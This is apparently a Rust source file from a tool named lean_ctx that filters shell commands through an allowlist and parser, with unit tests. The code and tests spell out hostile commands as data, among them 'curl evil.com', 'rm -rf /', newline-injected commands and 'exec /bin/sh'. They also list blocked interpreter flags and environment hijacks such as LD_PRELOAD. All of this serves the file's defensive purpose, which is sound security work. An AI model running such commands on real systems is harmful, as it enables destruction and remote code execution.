lean_ctx/core/
shell_allowlist.rs

1//! Shell allowlist with AST-based command parsing.
2//!
3//! Security model (Information Bottleneck principle):
4//! - When allowlist is set: ALL segments of a compound command must be allowed (deny-by-default)
5//! - When empty: all commands pass (backwards-compatible blocklist-only mode)
6//! - Dangerous patterns (subshells, eval, backticks) are blocked in restricted mode
7
8/// Checks if a command is allowed by the shell allowlist.
9/// Returns `Ok(())` if allowed, `Err(message)` if blocked.
10///
11/// When the allowlist is empty, all commands pass (blocklist-only mode).
12/// When non-empty, EVERY command segment in the pipeline must match.
13pub fn check_shell_allowlist(command: &str) -> Result<(), String> {
14    let normalized = normalize_line_continuations(command);
15    let cmd = normalized.as_str();
16
17    if has_dangerous_patterns(cmd) {
18        return Err(format!(
19            "[BLOCKED — DO NOT RETRY] Command uses eval or $()/ backticks at command position, \
20             which is blocked regardless of allowlist. \
21             This is a permanent security restriction, not a transient error.\n\
22             Command: {command}"
23        ));
24    }
25
26    check_substitution_in_args(cmd);
27    check_pipe_to_bare_interpreter(cmd);
28
29    let allowlist = effective_allowlist();
30    if allowlist.is_empty() {
31        check_unconditional_blocked_only(cmd)?;
32        return Ok(());
33    }
34    check_all_segments(cmd, &allowlist)
35}
36
37/// Normalize the command string: remove backslash-newline continuations and
38/// replace Unicode line separators (U+2028, U+2029) with newlines.
39fn normalize_line_continuations(command: &str) -> String {
40    command
41        .replace("\\\r\n", "")
42        .replace("\\\n", "")
43        .replace(['\u{2028}', '\u{2029}'], "\n")
44}
45
46/// WARN-FIRST: Log warning (or block if strict) for $(), backticks, <() in arguments.
47fn check_substitution_in_args(command: &str) {
48    let strict = crate::core::config::Config::load().shell_strict_mode;
49    if has_unquoted_substitution_in_args(command) {
50        if strict {
51            tracing::warn!(
52                "[SECURITY] Command substitution in arguments blocked (shell_strict_mode=true): {command}"
53            );
54        } else {
55            tracing::warn!(
56                "[SECURITY] Command substitution in arguments detected (warn-only, set shell_strict_mode=true to block): {command}"
57            );
58        }
59    }
60}
61
62/// Check for $(), backticks, <(, >( outside of command position, outside quotes.
63fn has_unquoted_substitution_in_args(command: &str) -> bool {
64    let bytes = command.as_bytes();
65    let len = bytes.len();
66    let mut i = 0;
67    let mut in_single_quote = false;
68    let mut in_double_quote = false;
69    let mut past_first_token = false;
70    let mut seen_space_after_cmd = false;
71
72    while i < len {
73        let ch = bytes[i];
74        if in_single_quote {
75            if ch == b'\'' {
76                in_single_quote = false;
77            }
78            i += 1;
79            continue;
80        }
81        if in_double_quote {
82            if ch == b'"' && (i == 0 || bytes[i - 1] != b'\\') {
83                in_double_quote = false;
84            }
85            i += 1;
86            continue;
87        }
88        match ch {
89            b'\'' => {
90                in_single_quote = true;
91                i += 1;
92            }
93            b'"' => {
94                in_double_quote = true;
95                i += 1;
96            }
97            b' ' | b'\t' if !past_first_token => {
98                seen_space_after_cmd = true;
99                i += 1;
100            }
101            _ if !seen_space_after_cmd => {
102                i += 1;
103            }
104            _ => {
105                past_first_token = true;
106                if ch == b'$' && i + 1 < len && bytes[i + 1] == b'(' {
107                    return true;
108                }
109                if ch == b'`' {
110                    return true;
111                }
112                if (ch == b'<' || ch == b'>') && i + 1 < len && bytes[i + 1] == b'(' {
113                    return true;
114                }
115                i += 1;
116            }
117        }
118    }
119    false
120}
121
122/// WARN-FIRST: Log warning for piping into bare interpreter (no script file).
123fn check_pipe_to_bare_interpreter(command: &str) {
124    let segments = split_on_operators(command);
125    let pipe_indices: Vec<usize> = {
126        let mut indices = Vec::new();
127        let bytes = command.as_bytes();
128        let len = bytes.len();
129        let mut j = 0;
130        let mut in_sq = false;
131        let mut in_dq = false;
132        while j < len {
133            if in_sq {
134                if bytes[j] == b'\'' {
135                    in_sq = false;
136                }
137                j += 1;
138                continue;
139            }
140            if in_dq {
141                if bytes[j] == b'"' && (j == 0 || bytes[j - 1] != b'\\') {
142                    in_dq = false;
143                }
144                j += 1;
145                continue;
146            }
147            match bytes[j] {
148                b'\'' => {
149                    in_sq = true;
150                    j += 1;
151                }
152                b'"' => {
153                    in_dq = true;
154                    j += 1;
155                }
156                b'|' if j + 1 < len && bytes[j + 1] != b'|' => {
157                    indices.push(j);
158                    j += 1;
159                }
160                _ => {
161                    j += 1;
162                }
163            }
164        }
165        indices
166    };
167    let _ = pipe_indices;
168
169    for (idx, seg) in segments.iter().enumerate() {
170        if idx == 0 {
171            continue;
172        }
173        if is_bare_interpreter_stdin(seg) {
174            let base = extract_base_from_segment(seg);
175            let strict = crate::core::config::Config::load().shell_strict_mode;
176            if strict {
177                tracing::warn!(
178                    "[SECURITY] Pipe to bare interpreter '{base}' blocked (shell_strict_mode=true)"
179                );
180            } else {
181                tracing::warn!("[SECURITY] Pipe to bare interpreter '{base}' detected (warn-only)");
182            }
183        }
184    }
185}
186
187/// For empty allowlists: still enforce UNCONDITIONAL_BLOCKED commands.
188fn check_unconditional_blocked_only(command: &str) -> Result<(), String> {
189    let segments = extract_all_commands(command);
190    for seg in &segments {
191        let base = extract_base_from_segment(seg);
192        if !base.is_empty() && UNCONDITIONAL_BLOCKED.contains(&base.as_str()) {
193            return Err(format!(
194                "[BLOCKED — DO NOT RETRY] '{base}' is unconditionally blocked \
195                 regardless of allowlist configuration.\n\
196                 Command: {command}"
197            ));
198        }
199        check_inline_env_block(seg)?;
200        check_interpreter_eval_only(seg)?;
201        check_dangerous_flags(seg)?;
202    }
203    Ok(())
204}
205
206/// Like `check_interpreter_abuse` but only checks for eval flags on interpreters.
207/// Skips delegation-command checks (which require an allowlist for membership test).
208/// Used in blocklist-only mode where there is no allowlist.
209fn check_interpreter_eval_only(segment: &str) -> Result<(), String> {
210    let trimmed = skip_env_assignments(segment.trim());
211    let tokens: Vec<&str> = trimmed.split_whitespace().collect();
212    if tokens.is_empty() {
213        return Ok(());
214    }
215    let base = tokens[0].rsplit('/').next().unwrap_or(tokens[0]);
216    if !INTERPRETER_COMMANDS.contains(&base) {
217        return Ok(());
218    }
219    for &tok in &tokens[1..] {
220        if EVAL_FLAGS.contains(&tok) {
221            return Err(format!(
222                "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with inline code execution \
223                 flag '{tok}' is blocked. Use a script file instead.\n\
224                 This is a permanent security restriction."
225            ));
226        }
227        if has_eval_flag_prefix(tok) {
228            return Err(format!(
229                "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with combined flag '{tok}' \
230                 containing eval flag is blocked.\n\
231                 This is a permanent security restriction."
232            ));
233        }
234    }
235    if tokens[1..].iter().any(|t| t.contains("<<")) {
236        return Err(format!(
237            "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with heredoc stdin is blocked. \
238             Use a script file instead.\n\
239             This is a permanent security restriction."
240        ));
241    }
242    Ok(())
243}
244
245/// Commands that are unconditionally blocked regardless of allowlist membership.
246/// These provide direct arbitrary code execution or re-enter the shell.
247const UNCONDITIONAL_BLOCKED: &[&str] = &["eval", "exec", "source", "."];
248
249/// Interpreters that can execute arbitrary code via -c/-e flags.
250const INTERPRETER_COMMANDS: &[&str] = &[
251    "python", "python3", "python2", "node", "ruby", "perl", "lua", "php", "bash", "sh", "zsh",
252    "fish", "dash", "ksh",
253];
254
255/// Flags that indicate inline code execution for interpreters.
256const EVAL_FLAGS: &[&str] = &[
257    "-c", "-e", "-r", "-p", "--eval", "--exec", "-exec", "--print", "--run",
258];
259
260/// Script file extensions that indicate a file argument (not stdin execution).
261const SCRIPT_EXTENSIONS: &[&str] = &[
262    ".py", ".rb", ".js", ".ts", ".pl", ".lua", ".php", ".sh", ".bash", ".zsh", ".mjs", ".cjs",
263    ".tsx", ".jsx",
264];
265
266/// Commands that delegate to another command (the delegated command must also be allowed).
267const DELEGATION_COMMANDS: &[&str] = &["env", "nice", "timeout", "sudo", "doas"];
268
269/// Check if a segment uses an interpreter with an eval flag, or a delegation command
270/// whose target is not in the allowlist.
271fn check_interpreter_abuse(segment: &str, allowlist: &[String]) -> Result<(), String> {
272    check_interpreter_abuse_inner(segment, allowlist, 0)
273}
274
275fn check_interpreter_abuse_inner(
276    segment: &str,
277    allowlist: &[String],
278    depth: usize,
279) -> Result<(), String> {
280    if depth > 3 {
281        return Ok(());
282    }
283    let trimmed = skip_env_assignments(segment.trim());
284    let tokens: Vec<&str> = trimmed.split_whitespace().collect();
285    if tokens.is_empty() {
286        return Ok(());
287    }
288
289    let base = tokens[0].rsplit('/').next().unwrap_or(tokens[0]);
290
291    if INTERPRETER_COMMANDS.contains(&base) {
292        for &tok in &tokens[1..] {
293            if EVAL_FLAGS.contains(&tok) {
294                return Err(format!(
295                    "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with inline code execution \
296                     flag '{tok}' is blocked. Use a script file instead.\n\
297                     This is a permanent security restriction."
298                ));
299            }
300            if has_eval_flag_prefix(tok) {
301                return Err(format!(
302                    "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with combined flag '{tok}' \
303                     containing eval flag is blocked.\n\
304                     This is a permanent security restriction."
305                ));
306            }
307        }
308        if tokens[1..].iter().any(|t| t.contains("<<")) {
309            return Err(format!(
310                "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with heredoc stdin is blocked. \
311                 Use a script file instead.\n\
312                 This is a permanent security restriction."
313            ));
314        }
315    }
316
317    if DELEGATION_COMMANDS.contains(&base) {
318        let rest_tokens: Vec<&str> = tokens[1..]
319            .iter()
320            .skip_while(|t| t.starts_with('-') || t.contains('='))
321            .copied()
322            .collect();
323        if let Some(&delegated_tok) = rest_tokens.first() {
324            let delegated = delegated_tok.rsplit('/').next().unwrap_or(delegated_tok);
325            if !delegated.is_empty() && !allowlist.iter().any(|a| a == delegated) {
326                return Err(format!(
327                    "[BLOCKED — DO NOT RETRY] '{base}' delegates to '{delegated}' which is not \
328                     in the shell allowlist. This is a permanent restriction."
329                ));
330            }
331            let rest_str = rest_tokens.join(" ");
332            check_interpreter_abuse_inner(&rest_str, allowlist, depth + 1)?;
333        }
334    }
335
336    Ok(())
337}
338
339/// Check for combined flags like -pe, -ne, -ce that contain eval characters.
340fn has_eval_flag_prefix(token: &str) -> bool {
341    if !token.starts_with('-') || token.starts_with("--") || token.len() < 3 {
342        return false;
343    }
344    let flag_chars = &token[1..];
345    let eval_chars = ['c', 'e', 'r', 'p'];
346    flag_chars.chars().any(|c| eval_chars.contains(&c))
347}
348
349/// Check if a segment is a bare interpreter after a pipe (no script file argument).
350fn is_bare_interpreter_stdin(segment: &str) -> bool {
351    let trimmed = skip_env_assignments(segment.trim());
352    let tokens: Vec<&str> = trimmed.split_whitespace().collect();
353    if tokens.is_empty() {
354        return false;
355    }
356    let base = tokens[0].rsplit('/').next().unwrap_or(tokens[0]);
357    if !INTERPRETER_COMMANDS.contains(&base) {
358        return false;
359    }
360    !tokens[1..]
361        .iter()
362        .any(|t| !t.starts_with('-') && SCRIPT_EXTENSIONS.iter().any(|ext| t.ends_with(ext)))
363}
364
365/// Dangerous flag patterns for specific commands.
366const DANGEROUS_GIT_FLAGS: &[&str] = &[
367    "--upload-pack",
368    "--receive-pack",
369    "--config=core.sshcommand",
370    "--config=core.gitproxy",
371];
372
373const DANGEROUS_TAR_FLAGS: &[&str] = &["--to-command", "--use-compress-program"];
374
375/// Blocked inline environment assignments that can hijack execution.
376const BLOCKED_INLINE_ENV: &[&str] = &[
377    "PATH=",
378    "GIT_ASKPASS=",
379    "GIT_SSH=",
380    "GIT_SSH_COMMAND=",
381    "GIT_EDITOR=",
382    "GIT_EXTERNAL_DIFF=",
383    "SSH_ASKPASS=",
384    "LD_PRELOAD=",
385    "DYLD_INSERT_LIBRARIES=",
386];
387
388fn check_dangerous_flags(segment: &str) -> Result<(), String> {
389    let trimmed = skip_env_assignments(segment.trim());
390    let tokens: Vec<&str> = trimmed.split_whitespace().collect();
391    if tokens.is_empty() {
392        return Ok(());
393    }
394    let base = tokens[0].rsplit('/').next().unwrap_or(tokens[0]);
395
396    match base {
397        "git" => {
398            for &tok in &tokens[1..] {
399                for flag in DANGEROUS_GIT_FLAGS {
400                    if tok.starts_with(flag) {
401                        return Err(format!(
402                            "[BLOCKED — DO NOT RETRY] 'git' with dangerous flag '{tok}' is blocked.\n\
403                             This is a permanent security restriction."
404                        ));
405                    }
406                }
407            }
408        }
409        "tar" => {
410            for &tok in &tokens[1..] {
411                for flag in DANGEROUS_TAR_FLAGS {
412                    if tok.starts_with(flag) {
413                        return Err(format!(
414                            "[BLOCKED — DO NOT RETRY] 'tar' with dangerous flag '{tok}' is blocked.\n\
415                             This is a permanent security restriction."
416                        ));
417                    }
418                }
419            }
420        }
421        "find" => {
422            for &tok in &tokens[1..] {
423                if tok == "-exec" || tok == "-execdir" {
424                    return Err(format!(
425                        "[BLOCKED — DO NOT RETRY] 'find' with '{tok}' is blocked. \
426                         Use 'find ... -print' and pipe to xargs instead.\n\
427                         This is a permanent security restriction."
428                    ));
429                }
430            }
431        }
432        "awk" | "gawk" | "mawk" => {
433            for &tok in &tokens[1..] {
434                if tok.contains("system(") {
435                    return Err(format!(
436                        "[BLOCKED — DO NOT RETRY] '{base}' with 'system()' call is blocked.\n\
437                         This is a permanent security restriction."
438                    ));
439                }
440            }
441        }
442        _ => {}
443    }
444    Ok(())
445}
446
447fn check_inline_env_block(segment: &str) -> Result<(), String> {
448    let trimmed = segment.trim();
449    for blocked in BLOCKED_INLINE_ENV {
450        if trimmed.starts_with(blocked) {
451            return Err(format!(
452                "[BLOCKED — DO NOT RETRY] Inline environment override '{blocked}' is blocked.\n\
453                 This is a permanent security restriction."
454            ));
455        }
456    }
457    Ok(())
458}
459
460fn check_all_segments(command: &str, allowlist: &[String]) -> Result<(), String> {
461    if allowlist.is_empty() {
462        return Ok(());
463    }
464
465    if has_dangerous_patterns(command) {
466        return Err(format!(
467            "[BLOCKED — DO NOT RETRY] Command uses eval or $()/ backticks at command position, \
468             which is blocked in restricted mode. \
469             This is a permanent security restriction, not a transient error.\n\
470             Command: {command}"
471        ));
472    }
473
474    let segments = extract_all_commands(command);
475    if segments.is_empty() {
476        return Err("[BLOCKED — DO NOT RETRY] Empty command".to_string());
477    }
478
479    for seg in &segments {
480        check_inline_env_block(seg)?;
481        let base = extract_base_from_segment(seg);
482        if base.is_empty() {
483            continue;
484        }
485        if UNCONDITIONAL_BLOCKED.contains(&base.as_str()) {
486            return Err(format!(
487                "[BLOCKED — DO NOT RETRY] '{base}' is unconditionally blocked \
488                 regardless of allowlist membership. \
489                 This is a permanent security restriction.\n\
490                 Command: {command}"
491            ));
492        }
493        check_interpreter_abuse(seg, allowlist)?;
494        check_dangerous_flags(seg)?;
495        if !allowlist.iter().any(|a| a == &base) {
496            return Err(format!(
497                "[BLOCKED — DO NOT RETRY] '{base}' is not in the shell allowlist. \
498                 This is a permanent restriction, not a transient error.\n\
499                 Fix: add '{base}' to shell_allowlist in ~/.lean-ctx/config.toml\n\
500                 Or disable the allowlist: shell_allowlist = []\n\
501                 Do NOT retry this command — it will fail again with the same error."
502            ));
503        }
504    }
505    Ok(())
506}
507
508/// Detect dangerous shell patterns that bypass allowlist intent.
509///
510/// Only blocks patterns that are genuinely dangerous at command position.
511/// `$()` and backticks in *arguments* are allowed — the base command is
512/// already validated by the allowlist, and blocking substitutions in
513/// arguments breaks legitimate workflows (e.g. `git commit -m "$(cat ...)"`,
514/// pre-commit hooks, playwright scripts).
515fn has_dangerous_patterns(command: &str) -> bool {
516    let trimmed = command.trim();
517
518    for blocked in UNCONDITIONAL_BLOCKED {
519        let with_space = format!("{blocked} ");
520        if trimmed.starts_with(&with_space) {
521            return true;
522        }
523        for sep in ["; ", "&& ", "|| ", "| ", "\n"] {
524            if trimmed.contains(&format!("{sep}{blocked} ")) {
525                return true;
526            }
527        }
528    }
529
530    if has_substitution_at_command_pos(trimmed) {
531        return true;
532    }
533
534    false
535}
536
537/// Check if `$()` or backticks appear at command position (first token
538/// of any segment). Substitutions in *arguments* are intentionally
539/// allowed — the security boundary is the base-command allowlist check.
540fn has_substitution_at_command_pos(command: &str) -> bool {
541    let segments = split_on_operators(command);
542    for seg in segments {
543        let trimmed = seg.trim();
544        let cmd_start = skip_env_assignments(trimmed);
545
546        if cmd_start.starts_with("$(") {
547            return true;
548        }
549
550        let first_token = cmd_start.split_whitespace().next().unwrap_or("");
551        if first_token.starts_with('`') || first_token == "`" {
552            return true;
553        }
554    }
555    false
556}
557
558/// Extract ALL command segments from a compound shell command.
559/// Splits on: &&, ||, ;, | (pipe), and handles subshell grouping.
560fn extract_all_commands(command: &str) -> Vec<String> {
561    split_on_operators(command)
562        .into_iter()
563        .map(|s| s.trim().to_string())
564        .filter(|s| !s.is_empty())
565        .collect()
566}
567
568/// Split command string on shell operators: ;, &&, ||, |
569/// Respects single/double quotes and parentheses nesting.
570fn split_on_operators(command: &str) -> Vec<&str> {
571    let mut segments = Vec::new();
572    let mut start = 0;
573    let bytes = command.as_bytes();
574    let len = bytes.len();
575    let mut i = 0;
576    let mut in_single_quote = false;
577    let mut in_double_quote = false;
578    let mut paren_depth: u32 = 0;
579
580    while i < len {
581        let ch = bytes[i];
582
583        if in_single_quote {
584            if ch == b'\'' {
585                in_single_quote = false;
586            }
587            i += 1;
588            continue;
589        }
590
591        if in_double_quote {
592            if ch == b'"' && (i == 0 || bytes[i - 1] != b'\\') {
593                in_double_quote = false;
594            }
595            i += 1;
596            continue;
597        }
598
599        match ch {
600            b'\'' => {
601                in_single_quote = true;
602                i += 1;
603            }
604            b'"' => {
605                in_double_quote = true;
606                i += 1;
607            }
608            b'(' => {
609                paren_depth += 1;
610                i += 1;
611            }
612            b')' => {
613                paren_depth = paren_depth.saturating_sub(1);
614                i += 1;
615            }
616            b'\n' | b'\r' | b';' if paren_depth == 0 => {
617                segments.push(&command[start..i]);
618                i += 1;
619                start = i;
620            }
621            b'&' if paren_depth == 0 => {
622                if i + 1 < len && bytes[i + 1] == b'&' {
623                    // &&
624                    segments.push(&command[start..i]);
625                    i += 2;
626                    start = i;
627                } else {
628                    // single & (background operator) — still a command separator
629                    segments.push(&command[start..i]);
630                    i += 1;
631                    start = i;
632                }
633            }
634            b'|' if paren_depth == 0 => {
635                if i + 1 < len && bytes[i + 1] == b'|' {
636                    // ||
637                    segments.push(&command[start..i]);
638                    i += 2;
639                    start = i;
640                } else {
641                    // pipe
642                    segments.push(&command[start..i]);
643                    i += 1;
644                    start = i;
645                }
646            }
647            _ => {
648                i += 1;
649            }
650        }
651    }
652
653    if start < len {
654        segments.push(&command[start..]);
655    }
656
657    segments
658}
659
660/// Extract the base command name from a single segment (no operators).
661fn extract_base_from_segment(segment: &str) -> String {
662    let trimmed = segment.trim();
663    if trimmed.is_empty() {
664        return String::new();
665    }
666
667    let cmd_part = skip_env_assignments(trimmed);
668    if cmd_part.is_empty() {
669        return String::new();
670    }
671
672    // Take first whitespace-delimited token as the command
673    let first_token = cmd_part.split_whitespace().next().unwrap_or("");
674
675    // Strip path prefix: /usr/bin/git -> git
676    first_token
677        .rsplit('/')
678        .next()
679        .unwrap_or(first_token)
680        .to_string()
681}
682
683/// Skip leading KEY=VALUE environment variable assignments.
684fn skip_env_assignments(segment: &str) -> &str {
685    let mut rest = segment;
686    loop {
687        let token = rest.split_whitespace().next().unwrap_or("");
688        if token.is_empty() {
689            return rest;
690        }
691        // env var assignment: contains '=' and doesn't start with '-' or '/'
692        if token.contains('=')
693            && !token.starts_with('-')
694            && !token.starts_with('/')
695            && !token.starts_with('.')
696        {
697            // Advance past this token
698            let after = &rest[rest.find(token).unwrap_or(0) + token.len()..];
699            rest = after.trim_start();
700        } else {
701            return rest;
702        }
703    }
704}
705
706fn effective_allowlist() -> Vec<String> {
707    // LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE completely replaces the config (for testing)
708    if let Ok(ov) = std::env::var("LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE") {
709        return ov
710            .split(',')
711            .map(|s| s.trim().to_string())
712            .filter(|s| !s.is_empty())
713            .collect();
714    }
715    let mut list = crate::core::config::Config::load().shell_allowlist;
716    if let Ok(env_val) = std::env::var("LEAN_CTX_SHELL_ALLOWLIST") {
717        for entry in env_val
718            .split(',')
719            .map(|s| s.trim().to_string())
720            .filter(|s| !s.is_empty())
721        {
722            if !list.contains(&entry) {
723                list.push(entry);
724            }
725        }
726    }
727    list
728}
729
730/// Public accessor for extracting all command segments.
731pub fn extract_all_commands_pub(command: &str) -> Vec<String> {
732    extract_all_commands(command)
733}
734
735// Legacy compat: single-segment extraction (used by other callers)
736pub fn extract_base_command(command: &str) -> String {
737    let first_seg = split_on_operators(command)
738        .into_iter()
739        .next()
740        .unwrap_or(command);
741    extract_base_from_segment(first_seg)
742}
743
744#[cfg(test)]
745mod tests {
746    use super::*;
747
748    // --- extract_base_command tests (legacy compat) ---
749
750    #[test]
751    fn extract_simple_command() {
752        assert_eq!(extract_base_command("git status"), "git");
753    }
754
755    #[test]
756    fn extract_with_path() {
757        assert_eq!(extract_base_command("/usr/bin/git log"), "git");
758    }
759
760    #[test]
761    fn extract_with_env_assignment() {
762        assert_eq!(extract_base_command("LANG=en_US git log"), "git");
763    }
764
765    #[test]
766    fn extract_chained_commands() {
767        assert_eq!(extract_base_command("cd /tmp && ls -la"), "cd");
768    }
769
770    #[test]
771    fn extract_piped_command() {
772        assert_eq!(extract_base_command("grep foo | wc -l"), "grep");
773    }
774
775    #[test]
776    fn extract_semicolon_chain() {
777        assert_eq!(extract_base_command("echo hello; rm -rf /"), "echo");
778    }
779
780    #[test]
781    fn extract_empty_command() {
782        assert_eq!(extract_base_command(""), "");
783    }
784
785    #[test]
786    fn extract_whitespace_only() {
787        assert_eq!(extract_base_command("   "), "");
788    }
789
790    #[test]
791    fn extract_multiple_env_vars() {
792        assert_eq!(extract_base_command("FOO=bar BAZ=qux cargo test"), "cargo");
793    }
794
795    // --- All-segments validation tests ---
796
797    fn allow(cmds: &[&str]) -> Vec<String> {
798        cmds.iter().map(std::string::ToString::to_string).collect()
799    }
800
801    #[test]
802    fn allowlist_empty_always_passes() {
803        assert!(check_all_segments("anything", &[]).is_ok());
804    }
805
806    #[test]
807    fn allowlist_blocks_unlisted() {
808        let list = allow(&["git", "cargo"]);
809        let result = check_all_segments("npm install", &list);
810        assert!(result.is_err());
811        assert!(result.unwrap_err().contains("npm"));
812    }
813
814    #[test]
815    fn allowlist_allows_listed() {
816        let list = allow(&["git", "cargo", "npm"]);
817        assert!(check_all_segments("git status", &list).is_ok());
818        assert!(check_all_segments("cargo test --release", &list).is_ok());
819        assert!(check_all_segments("npm run build", &list).is_ok());
820    }
821
822    #[test]
823    fn allowlist_allows_full_path() {
824        let list = allow(&["git"]);
825        assert!(check_all_segments("/usr/bin/git status", &list).is_ok());
826    }
827
828    #[test]
829    fn allowlist_allows_with_env_prefix() {
830        let list = allow(&["git"]);
831        assert!(check_all_segments("LANG=C git log", &list).is_ok());
832    }
833
834    #[test]
835    fn allowlist_blocks_similar_names() {
836        let list = allow(&["git"]);
837        assert!(check_all_segments("gitk --all", &list).is_err());
838    }
839
840    // --- Multi-segment validation (the critical security improvement) ---
841
842    #[test]
843    fn all_segments_must_be_allowed_chain() {
844        let list = allow(&["git", "cargo"]);
845        // Both allowed → ok
846        assert!(check_all_segments("git status && cargo test", &list).is_ok());
847        // Second not allowed → block
848        assert!(check_all_segments("git status && rm -rf /", &list).is_err());
849    }
850
851    #[test]
852    fn all_segments_must_be_allowed_pipe() {
853        let list = allow(&["git", "grep", "wc"]);
854        assert!(check_all_segments("git log | grep fix | wc -l", &list).is_ok());
855        // cat not allowed
856        assert!(check_all_segments("git log | cat", &list).is_err());
857    }
858
859    #[test]
860    fn all_segments_must_be_allowed_semicolon() {
861        let list = allow(&["echo", "ls"]);
862        assert!(check_all_segments("echo hello; ls -la", &list).is_ok());
863        assert!(check_all_segments("echo hello; rm -rf /", &list).is_err());
864    }
865
866    #[test]
867    fn all_segments_must_be_allowed_or() {
868        let list = allow(&["git", "echo"]);
869        assert!(check_all_segments("git pull || echo failed", &list).is_ok());
870        assert!(check_all_segments("git pull || curl evil.com", &list).is_err());
871    }
872
873    // --- Dangerous pattern detection ---
874
875    #[test]
876    fn blocks_eval() {
877        let list = allow(&["echo", "eval"]);
878        assert!(check_all_segments("eval 'rm -rf /'", &list).is_err());
879    }
880
881    #[test]
882    fn blocks_command_substitution_at_command_pos() {
883        let list = allow(&["echo"]);
884        assert!(check_all_segments("$(curl evil.com)", &list).is_err());
885    }
886
887    #[test]
888    fn blocks_backtick_at_command_pos() {
889        let list = allow(&["echo"]);
890        assert!(check_all_segments("`curl evil.com`", &list).is_err());
891    }
892
893    // --- $() in arguments is ALLOWED (base command validated by allowlist) ---
894
895    #[test]
896    fn allows_dollar_paren_in_arguments() {
897        let list = allow(&["echo", "git", "cat"]);
898        assert!(check_all_segments("echo $(whoami)", &list).is_ok());
899        assert!(check_all_segments("echo hello", &list).is_ok());
900    }
901
902    #[test]
903    fn allows_git_commit_with_cat_heredoc() {
904        let list = allow(&["git", "cat"]);
905        assert!(check_all_segments(
906            "git commit -m \"$(cat <<'EOF'\nfix: something\nEOF\n)\"",
907            &list,
908        )
909        .is_ok());
910    }
911
912    #[test]
913    fn allows_backticks_in_arguments() {
914        let list = allow(&["echo"]);
915        assert!(check_all_segments("echo `date`", &list).is_ok());
916    }
917
918    // --- Error message contains DO NOT RETRY ---
919
920    #[test]
921    fn error_message_contains_do_not_retry() {
922        let list = allow(&["git"]);
923        let err = check_all_segments("npm install", &list).unwrap_err();
924        assert!(
925            err.contains("DO NOT RETRY"),
926            "Error should contain 'DO NOT RETRY': {err}"
927        );
928        assert!(
929            err.contains("config.toml"),
930            "Error should mention config: {err}"
931        );
932    }
933
934    #[test]
935    fn error_message_for_dangerous_patterns_contains_do_not_retry() {
936        let list = allow(&["echo"]);
937        let err = check_all_segments("eval 'bad'", &list).unwrap_err();
938        assert!(
939            err.contains("DO NOT RETRY"),
940            "Error should contain 'DO NOT RETRY': {err}"
941        );
942    }
943
944    // --- Issue #294: pre-commit and playwright should work ---
945
946    #[test]
947    fn pre_commit_in_default_allowlist() {
948        let defaults = crate::core::config::default_shell_allowlist();
949        assert!(
950            defaults.contains(&"pre-commit".to_string()),
951            "pre-commit must be in default allowlist"
952        );
953    }
954
955    #[test]
956    fn playwright_in_default_allowlist() {
957        let defaults = crate::core::config::default_shell_allowlist();
958        assert!(
959            defaults.contains(&"playwright".to_string()),
960            "playwright must be in default allowlist"
961        );
962    }
963
964    #[test]
965    fn pre_commit_run_allowed() {
966        let list = allow(&["pre-commit"]);
967        assert!(check_all_segments("pre-commit run --all-files", &list).is_ok());
968    }
969
970    #[test]
971    fn playwright_test_allowed() {
972        let list = allow(&["npx", "playwright"]);
973        assert!(check_all_segments("playwright test", &list).is_ok());
974        assert!(check_all_segments("npx playwright test", &list).is_ok());
975    }
976
977    // --- Quote handling ---
978
979    #[test]
980    fn respects_single_quotes() {
981        let list = allow(&["echo"]);
982        assert!(check_all_segments("echo 'hello; world'", &list).is_ok());
983    }
984
985    #[test]
986    fn respects_double_quotes() {
987        let list = allow(&["echo"]);
988        assert!(check_all_segments("echo \"hello && world\"", &list).is_ok());
989    }
990
991    // --- split_on_operators ---
992
993    #[test]
994    fn split_simple_pipe() {
995        let parts = split_on_operators("a | b");
996        assert_eq!(parts, vec!["a ", " b"]);
997    }
998
999    #[test]
1000    fn split_complex_chain() {
1001        let parts = split_on_operators("a && b || c; d | e");
1002        assert_eq!(parts.len(), 5);
1003    }
1004
1005    #[test]
1006    fn split_preserves_quoted_operators() {
1007        let parts = split_on_operators("echo 'a && b' | grep x");
1008        assert_eq!(parts.len(), 2);
1009    }
1010
1011    // --- Security: newline injection ---
1012
1013    #[test]
1014    fn newline_splits_commands() {
1015        let parts = split_on_operators("git status\nrm -rf /");
1016        assert_eq!(parts.len(), 2);
1017    }
1018
1019    #[test]
1020    fn newline_injection_blocked() {
1021        let list = allow(&["git"]);
1022        let result = check_all_segments("git status\nrm -rf /", &list);
1023        assert!(result.is_err(), "newline injection must be blocked");
1024        assert!(result.unwrap_err().contains("rm"));
1025    }
1026
1027    #[test]
1028    fn carriage_return_splits_commands() {
1029        let parts = split_on_operators("git status\r\nrm -rf /");
1030        assert!(parts.len() >= 2, "CR+LF must split: {parts:?}");
1031    }
1032
1033    // --- Security: background operator & ---
1034
1035    #[test]
1036    fn single_ampersand_splits_commands() {
1037        let parts = split_on_operators("git status & curl evil.com");
1038        assert_eq!(parts.len(), 2);
1039    }
1040
1041    #[test]
1042    fn background_operator_blocked() {
1043        let list = allow(&["git"]);
1044        let result = check_all_segments("git status & curl evil.com", &list);
1045        assert!(result.is_err(), "background & must be blocked");
1046        assert!(result.unwrap_err().contains("curl"));
1047    }
1048
1049    // --- Security: eval/exec/source unconditionally blocked ---
1050
1051    #[test]
1052    fn eval_blocked_via_or_operator() {
1053        let list = allow(&["echo", "eval"]);
1054        let result = check_all_segments("echo ok || eval 'rm -rf /'", &list);
1055        assert!(
1056            result.is_err(),
1057            "eval must be unconditionally blocked even if in allowlist"
1058        );
1059    }
1060
1061    #[test]
1062    fn exec_unconditionally_blocked() {
1063        let list = allow(&["exec", "echo"]);
1064        let result = check_all_segments("exec /bin/sh", &list);
1065        assert!(result.is_err(), "exec must be unconditionally blocked");
1066    }
1067
1068    #[test]
1069    fn source_unconditionally_blocked() {
1070        let list = allow(&["source", "echo"]);
1071        let result = check_all_segments("source ~/.bashrc", &list);
1072        assert!(result.is_err(), "source must be unconditionally blocked");
1073    }
1074
1075    // --- Security: dangerous patterns checked even with empty allowlist ---
1076
1077    #[test]
1078    fn empty_allowlist_still_blocks_eval_at_start() {
1079        let result = check_shell_allowlist("eval 'rm -rf /'");
